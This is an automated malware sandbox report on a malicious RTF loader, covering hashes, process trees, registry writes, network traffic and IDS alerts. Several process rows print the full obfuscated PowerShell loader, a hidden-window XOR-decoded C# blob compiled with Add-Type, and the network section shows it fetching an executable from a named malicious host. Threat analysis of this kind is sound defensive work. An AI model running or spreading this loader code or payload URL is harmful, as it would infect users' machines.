| File name: | 6a80b6bc91e403329bd579a4d0ecfb42e4e0b342179ba6e008f4491f7b7827ad |
| Full analysis: | https://app.any.run/tasks/fb091d0f-00d6-406e-93a0-d405c6e3d4f1 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | September 11, 2019, 08:00:43 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | 83C1C50C2F6C137584CDF25AB68D3373 |
| SHA1: | F4DDC0ECFE2946B431A61AF180C8E290CCA2F5B1 |
| SHA256: | 6A80B6BC91E403329BD579A4D0ECFB42E4E0B342179BA6E008F4491F7B7827AD |
| SSDEEP: | 6144:zcsRcsRcsRcsRcsRcsRcsRcsRcsRcsRcsRcsWS:bxxxxxxxxxxx7 |
| .rtf | | | Rich Text Format (100) |
|---|
| Author: | Admin |
|---|---|
| LastModifiedBy: | Admin |
| CreateDate: | 2019:01:07 23:54:00 |
| ModifyDate: | 2019:01:07 23:54:00 |
| RevisionNumber: | 1 |
| TotalEditTime: | - |
| Pages: | 1 |
| Words: | - |
| Characters: | 4 |
| CharactersWithSpaces: | 4 |
| InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 356 | powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1264 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\3jk8e1fz.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 1392 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESFAC1.tmp" "c:\Users\admin\AppData\Local\Temp\CSCFAC0.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 2064 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE564.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE554.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 2096 | powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2160 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\g6s_6ms3.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 2304 | powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2392 | powershell -WindowStyle Hidden function g5a8ec4 { param($xa41378) $qa5bff = 'bae7e7';$dab23f = ''; for ($i = 0; $i -lt $xa41378.length; $i+=2) { $t61e6 = [convert]::ToByte($xa41378.Substring($i, 2), 16); $dab23f += [char]($t61e6 -bxor $qa5bff[($i / 2) % $qa5bff.length]); } return $dab23f; } $l6ae8d = '17120c59021731181643005a5914165e0b5042321c4411520f4f37420b430b0c00192c591604175815640713135e0652115a10440c590541364e1643070c4b730c56050f0a44115e01125e42165e0c0645641c44160408192c785914165e0b5042321c4411520f4f2b52110c6f6b1542075b0b024554095611124556535251551e6c215b0e2808470a451649475c00450c04090457154e240b43174e320e0c59110a4026004335450d0224530145071216154c6a42111055095e0141164304430b0245521d4307130b172c591631114545460758060653524a280b43354310410a01060355585c1b164310080b50454e56000305071e593a215b097e0f110a45111f400a00450b520e5257154917270f11451c670d080b43450a4243295804532e08074504451b434c6a45471703095e0617111504430c5442041d4300450c412c591167161345555c015155061f164310080b504555560406034c0c3925095b2c5a120e17434d1509041759005b5153471b45720c15174e35580b0f110a47610b131142045b32130a43005416434c6a45471703095e0617111504430c5442041d4300450c4107580a5b420c0000035256492c5911671613455c575100585c1b307e0c153543171718590152060f4e41105e0b43420b060253554e410a42111717080b43455b045856004c0c3925095b2c5a120e17434d1529041759005b51534b53095b404d45720b43101835580c59165c4765115b2f0e135228520f0e174e471b423200432956111520451758105c0356094407483817164303150c5445521a1500450b17140e0c53455f5a02545550564a280b43354310410a5350040152511b2c591631114545530756570f5c1b0b0f111706050457011e5e471703095e0617111504430c5442080b434559045857534d1e19280b4335431041060f030056595d1758170058530451544a0650565d5201554d1555045202540150525603500455525205471e4c0c0b074d545d5155555d0f580a2b0f116711454c3b00450a1e19060a430a170d040703530c1f280b4335431041025103555b5c14525c545357001f060f0456510f5d1b0554040f005456494705560701505302000454545107560704535203570751545407520651434c1e5e5e0449025103555b5c587e0b43321517193f52100e4c4c0258160e4558005556575e4a307e0c15354317170d00070f5756065c4d622c59163111454c0259140c59111704535352540a525a0c514d160f04525100034a060351070e4e0e04555d05030549071d03524d0a42111704535352541e4b1a02581158420e00555101591c274e1152393c454e510156580753584c5219560649071a07031b554f5b51180c2c5916311145455254070702560a2f0017440d560e4f245b09580129225b0a55030d4d044c0c2f0017440d560e4f2658154e4a185101510e00054907495254070702561b51485e5f5d54530350564d590716457e0b433215171f025104035c1931582b0f1101511f4b4a554f550753034c1b00010403500449044b5a0a520703545b45600055210d0c520b434218010552055f0f004045600703265b0c520c154d1e5e4416130c590217105557515c545f240b410c450d0f08520b434c26004323580e050045355616094d720b410b130a5908520c154b6415520108045b23580e0500454b761211095e065616080a59215616004c1c476b3e16000006520302471c020203590054511f405506075106065457154c0c1b0557005719260e125909580305235e09524a0650565d5201554d1555565354540651005707540f51535252555650025256515255065258555451535603510455535350515650555200510655005357555651025258500451535202550350045250515251545255545350054048494551050458061e5e67100e0652164431150445117e0c070a17130257525d0a0b52154135450a5407121664115610152c5903584a135105030e01485e671758010416444b64160017434d415754560f4c0c10041142175942515e4a1542000d0c5445441600115e06171115175e0b50420650565d5201554d4411450b0f0217100104055d54001e191211450c5905410a01060355585c0a4755030452525215591211450c590541070e53045602586411450b0f0219205a12151c0c035810490c5911170b5c550c0c0b175703535d54074f29520b5016095e5e4e0a50481e551c43074114525c545357000a26580c1700451119360e274e11524a145351010f01044b6410551115175e0b504a0849054c1b53574c0c070e545251544e0a4a020d56171e4a10000e0606540445694558540251005c0e39490c18571e42444558535456565c0e4b7b070f02430d6a4b5a1845004317130b17070e545251545e4a1f'; $l6ae8d2 = g5a8ec4($l6ae8d); Add-Type -TypeDefinition $l6ae8d2; [a6e34]::nf92d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2424 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\0kv9cdct.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 2448 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ksxt1ivd.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | !'" |
Value: 21272200640B0000010000000000000000000000 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1328218142 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1328218256 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1328218257 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 640B000024AA8E0F7768D50100000000 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ')" |
Value: 27292200640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | ')" |
Value: 27292200640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9F81.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 4012 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA8E7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3652 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB0E6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YCKZR52YKRKACO8D7Q8O.temp | — | |
MD5:— | SHA256:— | |||
| 2892 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB52B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3676 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB655.tmp | — | |
MD5:— | SHA256:— | |||
| 3796 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll | — | |
MD5:— | SHA256:— | |||
| 3796 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.out | — | |
MD5:— | SHA256:— | |||
| 3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KIHZUAKQNVF5FSV7M3VC.temp | — | |
MD5:— | SHA256:— | |||
| 2460 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRBC8E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3884 | powershell.exe | GET | 200 | 162.144.128.116:80 | http://bobbychiz.top/loveworld/maddy.exe | US | executable | 679 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3884 | powershell.exe | 162.144.128.116:80 | bobbychiz.top | Unified Layer | US | malicious |
Domain | IP | Reputation |
|---|---|---|
bobbychiz.top |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
1060 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
3884 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
3884 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
3884 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3884 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3884 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
Process | Message |
|---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|